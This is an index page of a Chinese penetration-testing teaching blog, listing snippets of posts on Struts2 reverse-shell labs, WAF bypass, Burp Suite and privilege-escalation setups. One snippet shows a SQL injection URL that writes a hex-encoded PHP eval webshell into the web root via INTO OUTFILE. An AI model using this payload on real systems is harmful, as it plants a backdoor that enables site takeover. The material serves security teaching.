请选择 进入手机版 | 继续访问电脑版
nvhack
2017-10-23

关于XSS平台关闭的公告

曾经梦想着,把平台做大做好, 梦想着做一个靠谱、稳定、长期的平台。 无奈....... 出师未捷身先死 长使英雄泪满襟 QQ群:10570999 留个图做为回忆吧 ...

nvhack
2018-9-1

网络安全培训零基础教学四个月打造安全精英

网络安全培训零基础教学四个月打造安全精英0费用入学,0基础就业班,工作后再还款! 有意向请联系必火老师:18622800700,手机微信同号。 详情请访问 http://xss.tv ...

nvhack
2018-10-9

通过构造post方式上传16进制格式文件,

晚上回来整理strtus2漏洞课件,收到当年去天融信工作面试我的那个大神发来个问题(没办法,只会php) 0x01,程序代码如下 0x02,使用方法,需要自己去构造post参数,如下图 0x03,但是这里有一个问题,就是 ...

nvhack
2018-9-28

linux系统ubuntu14.04.4提权实验环境搭建

ubuntu14.04.4下载地址: 链接:https://pan.baidu.com/s/1kqY3BzVop87Iid1TZJk67w 提取码:cuzt 1,安装apache  这时http://你机器的ip,就可以访问了。 2,安装mysql  安装过程中会要求你输入root用户的密码  ...

nvhack
2018-9-26

burpsuite2.0 安装使用

今天整理代码审计ppt,实验00截断,再使用burpsuite1.7.30版本抓包的时候出现问题,如果是http://localhost 的链接,那么包放开后也无法过去,直接卡死,研究了一个下午,发现是phpstudy2016惹的祸,莫名其妙, ...

nvhack
2018-7-2

SQL注入读写文件,课堂代码实录

1,写入webshell http://172.18.199.248/01-cookie/selectarticle.php?id=-1 union select 1,2,0x3C3F706870206576616C28245F504F53545B315D293F3E,4,5 into outfile 'C:\\xampp\\htdocs\\01-cookie\\conn.php' 2, ...

nvhack
2018-5-15

IIS6.0 burp 抓包写文件

首先要开启WebDav 这里可能出现问题,不要用火狐浏览器抓包 如果抓包,请删除,其他参数,只保留以下即可。 使用OPTIONS探测是否支持 PUT MOVE 协议 ...

nvhack
2018-5-4

扫目录过狗过waf方法

用御剑的朋友都遇到过这个页面吧,装狗了开启保护就会这样本机搭建安全狗设置发现,默认是过蜘蛛的,所以只要把http头来路改成蜘蛛的useragent就ok了无奈御剑和wscan 都是无法设置http头的,也无法用burp做代理中转 ...

nvhack
2018-4-12

关于mysql写入一句话遇到的问题

select into outfile "d://www//1.php"secure-file-priv特性 secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 [*]ure_file_priv的值为null ,表示限制mysqld ...

nvhack
2017-9-9

Struts S2-052复现成功-反弹Shell实验

在网上看了其他人复现的例子,方法,步骤都是对的,但是失败了 原因,不知道是不是原作者所写,总之,字符编码有问题,这种问题有可能是复制粘贴才会出现 其中s2-052,最重要的一点没有提及,就是 Content-Type: app ...

nvhack
2017-8-21

渗透测试面试题

一,给你印象最深的一次渗透测试 二,怎么防止网站被打cookie 三,你都使用什么扫描工具。AWVS,NESSUS,天境扫描器,topsec扫描,OPENVAS, 四,SQL注入和XSS怎么绕过网站的waf,比如说安全狗. 具体的绕过思路。 ...

nvhack
2017-8-15

kali linux 关于更新的一点经验分享

使用kali 也有几年了,用的时候不太多,sqlmap算是用的最多的,其次是nmap,其他的不怎么用。 最开始挺喜欢kali1.0的那个版本,后来又出来2.0,用的不太顺手,但最近也习惯了,因为本人有更新癖,就喜欢更新。 在kal ...

nvhack
2017-7-28

one plus 3 手机艰难安装php环境

去年10月份,特意买了一部一加3 手机,就是为了玩kali linux,但是php环境一直没有安装上,因为内置的apache2 启动失败,爆的错误是 apache2action start failed! 各种百度谷歌都无果,弄了好长时间也没有弄 ...

nvhack
2017-6-21

如何防止网站被篡改?

如何来防止别人入侵了我们的网站,在我们正常的文件上作了后门 其实我们可以给每一个文件生成一个md5值 如果md5值变了,那么文件必然被修改过 可以生成md5值然后插入数据库,然后写个程序进行查询对比,验证, ...

nvhack
2017-5-31

宽字节注入代码靶机分享

好久没有写日志了,这几天正在从事伟大的职业——教师。 教书育人,咱要对得起祖国,好好培养这些小青年,所以一定要认真备课,认真搭建测试环境。 复制以下代码,以中文格式保存 ...

nvhack
2017-5-7

docker 下的utuntu 安装apache php

其实和真实机器一样的进入docker 一路默认即可 2,安装php //一路默认即可[/backcolor]

nvhack
2017-4-27

关于nmap 导出结果为xml的处理办法

在一家公司做项目,同事把nmap结果导出为xml,因为要对同一端口,如21进行弱口令探测,需要整理成excel表格,ip:port形式 xml格式如下,感觉很乱 使用php语言,按行读取文件 输出结果如图: ...

nvhack
2017-4-25

渗透测试利器-大数量IP地址以及端口扫描

渗透测试利器 IP 段 端口扫描 突然某一天,你接到上级指示,要在一天之内完成10万ip的常用端口扫描,及弱口令探测, 是不是非常苦逼了,因为这么短的时间几乎不可能,不过现在成为可能了,我有利器。 利器一: 把 ...

nvhack
2017-4-24

vmware 安装Windows10遇到的问题

当你遇到这种vmware虚拟机安装Windows10找不到硬盘的时候,或者是找不到光驱,百度各种无果的时候,真的想砸键盘。 但还是别砸了,有办法了。 https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ Win ...

nvhack
2017-4-20

SQL注入 上传绕过安全狗

SQL注入 上传绕过安全狗 (仅供天融信内部使用) -----收集整理 by: www.nvhack.com 推荐网站:http://xss.tv 国内长度最短 ...

nvhack
2017-4-19

Windows下载安装docker

Windows下载安装docker 新一极渗透测试教育培训第一课: 为什么要把docker放在第一课? 工欲善其事,必先利其器。 一,安装方法 1,Docker下载地址 : https://www.docker.com/docker-windows https://downl ...

123下一页
返回顶部 返回版块